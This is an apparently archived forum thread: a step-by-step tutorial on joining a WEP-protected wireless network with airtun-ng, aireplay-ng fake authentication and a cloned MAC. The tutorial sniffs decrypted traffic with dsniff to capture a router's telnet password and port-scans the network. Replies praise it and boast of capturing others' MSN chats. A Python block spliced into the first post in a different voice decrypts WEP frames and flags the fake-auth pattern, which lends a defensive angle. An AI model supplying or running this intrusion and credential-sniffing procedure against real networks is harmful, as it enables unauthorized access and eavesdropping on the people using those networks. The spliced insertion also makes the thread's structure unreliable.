
Thread: Using airtun-ng to monitor WLAN in real-time and be joined as a client via injection

  1. #1
    Just burned his ISO
    Join Date
    Feb 2009

    Using airtun-ng to monitor WLAN in real-time and be joined as a client via injection

    In this post I will show you how you can use airtun-ng to create a virtual interface which will allow you to monitor WLAN traffic in real-time with an IDS or other packet sniffer, and at the same time, use the virtual interface to inject traffic and essentially become a client of the network.

    The following is the info for the AP in this demonstration:

    essid: airtun-demo
    mac: 00:18:F8:F0:00:01
    wep: 5CE6A435786A4135A512EB6FB5
    channel: 11

    The first thing we will do is make sure our card is in monitor mode on the appropriate channel:
    airmon-ng stop ath0
    airmon-ng start wifi0 11
    Then we will run the following airtun-ng command:
    bt ~ # airtun-ng -a 00:18:F8:F0:00:01 -w 5CE6A435786A4135A512EB6FB5 -t 1 ath0
    created tap interface at0
    WEP encryption specified. Sending and receiving frames through ath0.
    ToDS bit set in all frames.
    "-a" specifies the bssid of the target AP and "-w" is the WEP (I am assuming you already cracked/know it for this example). One important thing is the "-t" option. I specified a value of 1 for this example because I just want to communicate with the AP and/or wired clients. If you change it to 0 this should allow you to communicate with wireless clients. Try playing with this setting if you cannot reach certain hosts.

    Also, if you receive the following error message...
    error opening tap device: No such file or directory
    try "modprobe tun"
    error opening tap device: No such file or directory
    ...just run "modprobe tun" from the shell before starting airtun-ng.

    So now that airtun-ng is running, we can use any packet capture utility we want to monitor the wireless traffic. This could be your snort IDS software, wireshark for analysis, driftnet to be creepy and grab web pics. I used dsniff here to grab a telnet password to the wireless router:
    bt ~ # dsniff -i at0
    dsniff: listening on at0
    03/07/09 20:15:19 tcp -> DD-WRT.23 (telnet)
    Normally, utilities like these would give you "unknown data-link type" errors when trying to start the capture, but the at0 interface created by airtun-ng replays all traffic for us, decrypted with the WEP, and with the 802.11 info removed so it is now a standard ethernet in the eyes of our sniffer programs.

    Well, this is spectacular, but what if you want to take it further? You can't scan the network or perform MITM attacks without being able to send packets into the network. I guess you could always just use another wireless interface for this part, but that would defeat the purpose of this "how-to"! Also, if you are having trouble connecting to WEP networks with your current card driver, you could actually tunnel all your traffic through airtun-ng and take your driver limitations out of the equation (assuming your card supports injection). Plus, some people may only have 1 interface to work with.

    First, we need to clone the MAC of the interface we are using to capture the wireless traffic, and assign it to our at0 interface. Otherwise, the AP will not know what to do with our packets once it receives them. It needs to know the actual physical interface to respond to.
    bt ~ # ifconfig ath0
    ath0      Link encap:UNSPEC  HWaddr 00-15-6D-54-00-01-A8-0F-00-00-00-00-00-00-00-00
              RX packets:11808 errors:0 dropped:0 overruns:0 frame:0
              TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:2880777 (2.7 MiB)  TX bytes:227 (227.0 b)
    ^^ Checking the ath0 MAC

    Now let's assign to our tunnel interface...
    bt ~ # macchanger -m 00:15:6D:54:00:01 at0
    Current MAC: 82:cf:78:7e:22:22 (unknown)
    Faked MAC:   00:15:6d:54:00:01 (unknown)
    Now it is assigned to our virtual interface.

    And one final requirement before we can inject traffic: we need to associate ourselves with the target AP. For this we will use a simple command with aireplay-ng.
    bt ~ # aireplay-ng -a 00:18:F8:F0:00:01 --fakeauth 5 ath0
    No source MAC (-h) specified. Using the device MAC (00:15:6D:54:00:01)
    20:13:05  Waiting for beacon frame (BSSID: 00:18:F8:F0:00:01) on channel 11
    20:13:06  Sending Authentication Request (Open System) [ACK]
    20:13:06  Authentication successful
    20:13:06  Sending Association Request [ACK]
    20:13:06  Association successful :-) (AID: 1)
    "-a" is the bssid of our target AP, "--fakeauth 5" says to associate every 5 seconds, and ath0 is our replay interface.

    Now we are good to go.

    Let's bring up the at0 interface... (airtun-ng will always start with the interface down)
    ifconfig at0 up
    Let's see if the AP will give us an address via DHCP.

    bt ~ # dhcpcd at0
    bt ~ # ifconfig at0
    at0       Link encap:Ethernet  HWaddr 00:15:6D:54:00:01
              inet addr:  Bcast:  Mask:
              RX packets:11 errors:0 dropped:0 overruns:0 frame:0
              TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:500
              RX bytes:3290 (3.2 KiB)  TX bytes:1240 (1.2 KiB)
    Ta-da! We are now sniffing all wireless traffic for this AP in promiscuous mode, and are also joined to the network and can inject and receive packets like a normal host. All with the same physical interface.

    Pinging the AP...
    bt ~ # ping
    PING ( 56(84) bytes of data.
    64 bytes from icmp_seq=1 ttl=64 time=4.98 ms
    64 bytes from icmp_seq=2 ttl=64 time=2.33 ms
    64 bytes from icmp_seq=3 ttl=64 time=2.34 ms
    64 bytes from icmp_seq=4 ttl=64 time=2.32 ms
    64 bytes from icmp_seq=5 ttl=64 time=2.33 ms
    --- ping statistics ---
    5 packets transmitted, 5 received, 0% packet loss, time 4001ms
    rtt min/avg/max/mdev = 2.321/2.863/4.984/1.060 ms
    A quick port scan...
    bt ~ # nmap -e at0 -F
    Starting Nmap 4.85BETA3 ( hxxp:// ) at 2009-03-07 20:19 GMT
    Interesting ports on DD-WRT (
    Not shown: 97 closed ports
    23/tcp open  telnet
    53/tcp open  domain
    80/tcp open  http
    MAC Address: 00:18:F8:FC:00:A0 (Cisco-Linksys)
    Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
    You will probably need to specify the interface to use for scanning with nmap. When I didn't it would give me an error and default to eth0. This may be the case with other programs also.

    So there you have it. If anyone has any pointers or criticisms please let me know. Thanks.
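Two things in the how-to above are easier to understand with a few lines of code: what the at0 tap interface actually hands to a sniffer (a WEP data frame decrypted with the known key, the 802.11 and LLC/SNAP headers stripped, and an Ethernet header rebuilt from the address fields, which is why the ToDS/FromDS bits matter), and what the "--fakeauth 5" step looks like on the air from a WIDS operator's side, where one station re-authenticating to the same BSSID at a fixed period is a classic signature. The following is an added example written for this thread; it is not code from the post, nor from the aircrack-ng project. It reuses the BSSID, WEP key and cloned station MAC from the post; the "wired host" MAC, the frame contents, the timestamps and the detection thresholds are constructed, and it assumes plain (non-QoS, three-address) data frames.

```python
import struct
import zlib

# Values from the thread: AP BSSID, WEP key, and the station MAC cloned onto at0.
BSSID = bytes.fromhex("0018F8F00001")
STA = bytes.fromhex("00156D540001")
WEP_KEY = bytes.fromhex("5CE6A435786A4135A512EB6FB5")
WIRED_HOST = bytes.fromhex("00AA0BB0CC01")   # constructed MAC of a wired host behind the AP
LLC_SNAP = bytes.fromhex("AAAA03000000")     # LLC/SNAP header that precedes the ethertype


def rc4(key, data):
    """Plain RC4 (KSA + PRGA), the cipher WEP wraps. Symmetric, so it both
    builds the constructed test frame and decrypts it."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_header(frame):
    """Split a 24-byte 802.11 header into type/subtype, DS/Protected flags and addresses."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    return {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "to_ds": bool(fc & 0x0100), "from_ds": bool(fc & 0x0200),
            "protected": bool(fc & 0x4000),
            "a1": frame[4:10], "a2": frame[10:16], "a3": frame[16:22],
            "body": frame[24:]}


def wep_decrypt(body):
    """body = IV(3) | key-id(1) | RC4(payload | ICV). Verifies the CRC-32 ICV."""
    iv, ciphertext = body[:3], body[4:]
    plain = rc4(iv + WEP_KEY, ciphertext)
    payload, icv = plain[:-4], plain[-4:]
    if struct.pack("<I", zlib.crc32(payload)) != icv:
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return payload


def to_ethernet(frame):
    """What at0 delivers to dsniff/Wireshark: decrypted payload behind a rebuilt
    Ethernet header. Which address field is SA/DA depends on ToDS/FromDS."""
    h = parse_header(frame)
    if h["type"] != 2:
        raise ValueError("not a data frame")
    if h["to_ds"] and h["from_ds"]:
        raise ValueError("4-address (WDS) frames not handled here")
    if h["to_ds"]:            # station -> AP:  a1=BSSID a2=SA a3=DA
        sa, da = h["a2"], h["a3"]
    elif h["from_ds"]:        # AP -> station:  a1=DA a2=BSSID a3=SA
        sa, da = h["a3"], h["a1"]
    else:                     # ad hoc:         a1=DA a2=SA a3=BSSID
        sa, da = h["a2"], h["a1"]
    payload = wep_decrypt(h["body"]) if h["protected"] else h["body"]
    if payload[:6] != LLC_SNAP:
        raise ValueError("no LLC/SNAP header")
    return da + sa + payload[6:]          # ethertype + data follow the SNAP header


def build_wep_frame(sa, da, ethertype, data, iv=b"\x01\x02\x03"):
    """Constructed AP->station (FromDS, Protected) WEP data frame."""
    payload = LLC_SNAP + struct.pack("!H", ethertype) + data
    icv = struct.pack("<I", zlib.crc32(payload))
    header = struct.pack("<HH", 0x4208, 0) + da + BSSID + sa + b"\x00\x00"
    return header + iv + b"\x00" + rc4(iv + WEP_KEY, payload + icv)


def build_auth_frame(sa):
    """Constructed Open System authentication request (management frame, subtype 11)."""
    header = struct.pack("<HH", 0x00B0, 0) + BSSID + sa + BSSID + b"\x00\x00"
    return header + struct.pack("<HHH", 0, 1, 0)   # algo=Open, seq=1, status=0


def flag_periodic_auth(timed_frames, min_count=3, jitter=0.5):
    """Defender view of "--fakeauth 5": a station re-authenticating to one BSSID
    at a near-constant interval. Returns {(sta, bssid): mean period in seconds}."""
    seen = {}
    for ts, frame in timed_frames:
        h = parse_header(frame)
        if h["type"] == 0 and h["subtype"] == 11:
            seen.setdefault((h["a2"], h["a3"]), []).append(ts)
    flagged = {}
    for key, times in seen.items():
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(times) >= min_count and max(gaps) - min(gaps) <= jitter:
            flagged[key] = sum(gaps) / len(gaps)
    return flagged


def demo():
    # Constructed IPv4 payload from the wired host to our station, plus a constructed
    # capture of auth requests: STA every ~5 s (the fakeauth pattern), one-off from another MAC.
    frame = build_wep_frame(WIRED_HOST, STA, 0x0800, b"\x45" + b"\x00" * 19 + b"telnet banner")
    auths = [(t, build_auth_frame(STA)) for t in (0.0, 5.0, 10.1, 15.0)]
    auths.append((2.0, build_auth_frame(WIRED_HOST)))
    return to_ethernet(frame), flag_periodic_auth(auths)


if __name__ == "__main__":
    eth, flagged = demo()
    print("at0 would deliver:", eth.hex())
    for (sta, bssid), period in flagged.items():
        print(f"{sta.hex(':')} re-authenticates to {bssid.hex(':')} every {period:.1f}s")
```

The ICV check in wep_decrypt is the reason a wrong "-w" key shows up as silence on at0 rather than garbage: frames that fail the check are simply not forwarded. On the detection side, a real WIDS would also correlate the periodic authentication requests with the station already holding an association (AID) to the same AP, which is exactly the state the aireplay-ng output above leaves behind.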

  2. #2
    Senior Member
    Join Date
    Jan 2010


    I was just looking around for some airtun-ng related discussion and ended up with your howto thread as a search result. Since you took your time to put this together and have gotten no replies, I'd just like to compliment you on it. It's a nice and thoroughly put together how-to about a rather powerful, versatile (and often overlooked) tool within the aircrack-ng suite. , granted, is an older (2008) blog posted tutorial on airtun-ng/wireshark usage, but it does decently illustrate some of the types of scenarios/attacks which are possible via airtun-ng.

  3. #3
    Junior Member imported_painter13
    Join Date
    Jul 2008


    Thanks for the tut... Works like a charm!

  4. #4
    Junior Member Isohump
    Join Date
    Sep 2009


    Great tut, just tried it out.. OH and clone, thanks for that link, just learned how to capture MSN conversations ^_^
    One day your life will flash before your eyes. Make sure it's worth watching.

  5. #5
    My life is this forum Snayler
    Join Date
    Jan 2010


    Quote Originally Posted by Isohump
    OH and clone, thanks for that link, just learned how to capture MSN conversations ^_^
    Ettercap does that already...
